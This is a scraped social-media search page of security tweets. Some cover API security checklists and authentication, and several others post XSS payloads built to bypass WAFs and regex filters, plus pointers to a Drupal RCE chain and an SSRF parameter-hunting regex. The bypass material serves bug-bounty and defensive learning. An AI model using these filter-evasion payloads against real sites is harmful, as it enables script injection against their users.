#techniques_to_secure_your_soap_and_rest_api arama sonuçları

"#techniques_to_secure_your_soap_and_rest_api" için sonuç bulunamadı

How do we design secure and safe APIs? The rise in API-related security breaches highlights the necessity for robust API security. Let’s look at 12 essential tips for improving API security: 𝗥𝗮𝘁𝗲 𝗹𝗶𝗺𝗶𝘁𝗶𝗻𝗴 𝗮𝗻𝗱 𝘁𝗵𝗿𝗼𝘁𝘁𝗹𝗶𝗻𝗴 ↳ Throttling and rate limiting…

NikkiSiapno's tweet image. How do we design secure and safe APIs?

The rise in API-related security breaches highlights the necessity for robust API security.

Let’s look at 12 essential tips for improving API security:

𝗥𝗮𝘁𝗲 𝗹𝗶𝗺𝗶𝘁𝗶𝗻𝗴 𝗮𝗻𝗱 𝘁𝗵𝗿𝗼𝘁𝘁𝗹𝗶𝗻𝗴
↳ Throttling and rate limiting…

A XSS payload with Alert Obfuscation, for bypass RegEx filters <img src="X" onerror=top[8680439..toString(30)](1337)> <script>top[8680439..toString(30)](1337)</script> #infosec #cybersec #bugbountytip #BugBounty

wtf_brut's tweet image. A XSS payload with Alert Obfuscation, for bypass RegEx filters

&amp;lt;img src=&quot;X&quot; onerror=top[8680439..toString(30)](1337)&amp;gt;

&amp;lt;script&amp;gt;top[8680439..toString(30)](1337)&amp;lt;/script&amp;gt;

#infosec #cybersec #bugbountytip #BugBounty

Cloudflare WAF Bypass → XSS 💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --'<00 foo="<a%20href="javascript​:prompt(404)">XSS-Click</00>--%20// #CyberSecurity #BugBounty #XSS

NullSecurityX's tweet image. Cloudflare WAF Bypass → XSS 💡

The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS:

--&apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript​:prompt(404)&quot;&amp;gt;XSS-Click&amp;lt;/00&amp;gt;--%20//

#CyberSecurity #BugBounty #XSS

VMware Workstation guest-to-host escape (CVE-2023-20870/CVE-2023-34044 and CVE-2023-20869) nccgroup.com/media/b2chcbti… Credits Alexander Zaviyalov (@NCCGroupInfosec) #infosec

0xor0ne's tweet image. VMware Workstation guest-to-host escape (CVE-2023-20870/CVE-2023-34044 and CVE-2023-20869)

nccgroup.com/media/b2chcbti…

Credits Alexander Zaviyalov (@NCCGroupInfosec)

#infosec
0xor0ne's tweet image. VMware Workstation guest-to-host escape (CVE-2023-20870/CVE-2023-34044 and CVE-2023-20869)

nccgroup.com/media/b2chcbti…

Credits Alexander Zaviyalov (@NCCGroupInfosec)

#infosec

Top 12 Tips for API Security - Use HTTPS - Use OAuth2 - Use WebAuthn - Use Leveled API Keys - Authorization - Rate Limiting - API Versioning - Whitelisting - Check OWASP API Security Risks - Use API Gateway - Error Handling - Input Validation – Subscribe to our weekly…

sahnlam's tweet image. Top 12 Tips for API Security

- Use HTTPS
- Use OAuth2
- Use WebAuthn
- Use Leveled API Keys
- Authorization
- Rate Limiting
- API Versioning
- Whitelisting
- Check OWASP API Security Risks
- Use API Gateway
- Error Handling
- Input Validation

–
Subscribe to our weekly…

Old Cloudflare XSS bypass but still works . . <img alt="<x" title="/><img src=x onerror=alert(6)>">

19whoami19's tweet image. Old Cloudflare XSS bypass but still works
.
.
&amp;lt;img alt=&quot;&amp;lt;x&quot; title=&quot;/&amp;gt;&amp;lt;img src=x onerror=alert(6)&amp;gt;&quot;&amp;gt;

PHP deserialization techniques DRUPAL 1-CLICK TO RCE EXPLOIT CHAIN DETAILED /sites/default/files/pictures/<YYYY-MM>/_0 instead of: /sites/default/files/pictures/<YYYY-MM>/profile_pic.gif. [Demo] youtu.be/GT5LCO7D3SE zerodayinitiative.com/blog/2019/4/11…


XSS: Arithmetic Operators & Optional Chaining To Bypass Filters & Sanitization secjuice.com/xss-arithmetic… #infosec #XSS #cybersec #bugbountytips

0x0SojalSec's tweet image. XSS: Arithmetic Operators &amp;amp; Optional Chaining To Bypass Filters &amp;amp; Sanitization

secjuice.com/xss-arithmetic…

#infosec #XSS #cybersec #bugbountytips

[ Microservices - Authentication Mechanisms ] Give it a read 👇 Pro tip => These Authentication Mechanisms/Types are not limited just to microservices. [1.] 𝐀𝐏𝐈 𝐊𝐞𝐲𝐬 ◾ Simple, unique identifiers assigned to each client or service. ◾ Sent as a header or query parameter…

techNmak's tweet image. [ Microservices - Authentication Mechanisms ] Give it a read 👇

Pro tip =&amp;gt; These Authentication Mechanisms/Types are not limited just to microservices.

[1.] 𝐀𝐏𝐈 𝐊𝐞𝐲𝐬
◾ Simple, unique identifiers assigned to each client or service.
◾ Sent as a header or query parameter…

API Security Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API. github.com/shieldfy/API-S… #cybersecurity #api #hacking #bughunting

0xAsm0d3us's tweet image. API Security Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API.

github.com/shieldfy/API-S…

#cybersecurity #api #hacking #bughunting

XSS on a login page while stuck in an input tag with <> filtered. Final Payload: " formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src="" Also gets around "javascript" and "alert" blacklist with html entity Tab obfuscation. #BugBountyTips #bugbounty #XSS

TakSec's tweet image. XSS on a login page while stuck in an input tag with &amp;lt;&amp;gt; filtered.  Final Payload:

&quot; formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src=&quot;&quot;

Also gets around &quot;javascript&quot; and &quot;alert&quot; blacklist with html entity Tab obfuscation.

#BugBountyTips #bugbounty #XSS

𝗔𝗣𝗜 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗖𝗵𝗲𝗰𝗸𝗹𝗶𝘀𝘁 Checklist of the most important security countermeasures when designing, testing, and releasing your API. Check the link in the comments. #api #security

milan_milanovic's tweet image. 𝗔𝗣𝗜 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗖𝗵𝗲𝗰𝗸𝗹𝗶𝘀𝘁

Checklist of the most important security countermeasures when designing, testing, and releasing your API.

Check the link in the comments.

#api #security

Observed a weird WAF bypass case: > WAF blocked <img> tag > 'src' attr got blocked too > Found WAF didn't block <image> Finally crafted: <image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'> > BOOM #infosec #bugbounty #bugbountytips

0xInfection's tweet image. Observed a weird WAF bypass case:

&amp;gt; WAF blocked &amp;lt;img&amp;gt; tag
&amp;gt; &apos;src&apos; attr got blocked too
&amp;gt; Found WAF didn&apos;t block &amp;lt;image&amp;gt;

Finally crafted:

&amp;lt;image src\r\n=valid.jpg onloadend=&apos;new class extends (co\u006efir\u006d)/**/`` &amp;amp;lcub;&amp;amp;rcub;&apos;&amp;gt;

&amp;gt; BOOM

#infosec #bugbounty #bugbountytips

API Security Testing Checklist 🌵 Talked about Authentication, JWT (JSON Web Token), OAuth, Access, Input/Output, Processing, CI & CD, etc #API #hacking #bugbounty #bugbountytips #infosec #cybersecurity URL : github.com/shieldfy/API-S…

aacle_'s tweet image. API Security Testing Checklist 🌵

Talked about Authentication, JWT (JSON Web Token), OAuth, Access, Input/Output, Processing, CI &amp;amp; CD, etc

#API #hacking #bugbounty #bugbountytips #infosec #cybersecurity 

URL :
github.com/shieldfy/API-S…

Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect: Burp Search > Regex \?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w]) And find potentially vulnerable SSRF params - github.com/In3tinct/See-S… #SSRF #cybersec

0x0SojalSec's tweet image. Quick and dirty way to find parameters vulnerable to LFI &amp;amp; Path Traversal &amp;amp; SSRF &amp;amp; Open Redirect:
Burp Search &amp;gt; Regex 
\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])

And find potentially vulnerable SSRF params 
- github.com/In3tinct/See-S…
#SSRF #cybersec

Bug Bounty Tip Always check different encodings for your XSS payload. For example: ?q=<img src onerror=alert(1)> ?q=\u003cimg src onerror=alert(1)\u003e There might be a filter that removes <>, but not unicode symbols \u003c \u003e. Cheers!

therceman's tweet image. Bug Bounty Tip

Always check different encodings for your XSS payload.

For example:
?q=&amp;lt;img src onerror=alert(1)&amp;gt;
?q=\u003cimg src onerror=alert(1)\u003e

There might be a filter that removes &amp;lt;&amp;gt;, 
but not unicode symbols \u003c \u003e.

Cheers!

How can you avoid common security pitfalls in your .NET Web Application? 𝟏/ 𝐔𝐬𝐞 𝐇𝐓𝐓𝐏𝐬 Ensure that your API is only accessible over HTTPS. You can enforce this in your application 𝚊𝚙𝚙.𝚄𝚜𝚎𝙷𝚝𝚝𝚙𝚜𝚁𝚎𝚍𝚒𝚛𝚎𝚌𝚝𝚒𝚘𝚗(); 𝟐/ 𝐀𝐮𝐭𝐡𝐞𝐧𝐭𝐢𝐜𝐚𝐭𝐢𝐨𝐧…

mwaseemzakir's tweet image. How can you avoid common security pitfalls in your .NET Web Application?

𝟏/ 𝐔𝐬𝐞 𝐇𝐓𝐓𝐏𝐬
Ensure that your API is only accessible over HTTPS. You can enforce this in your application

𝚊𝚙𝚙.𝚄𝚜𝚎𝙷𝚝𝚝𝚙𝚜𝚁𝚎𝚍𝚒𝚛𝚎𝚌𝚝𝚒𝚘𝚗();

𝟐/ 𝐀𝐮𝐭𝐡𝐞𝐧𝐭𝐢𝐜𝐚𝐭𝐢𝐨𝐧…

Loading...

Something went wrong.


Something went wrong.


United States Trends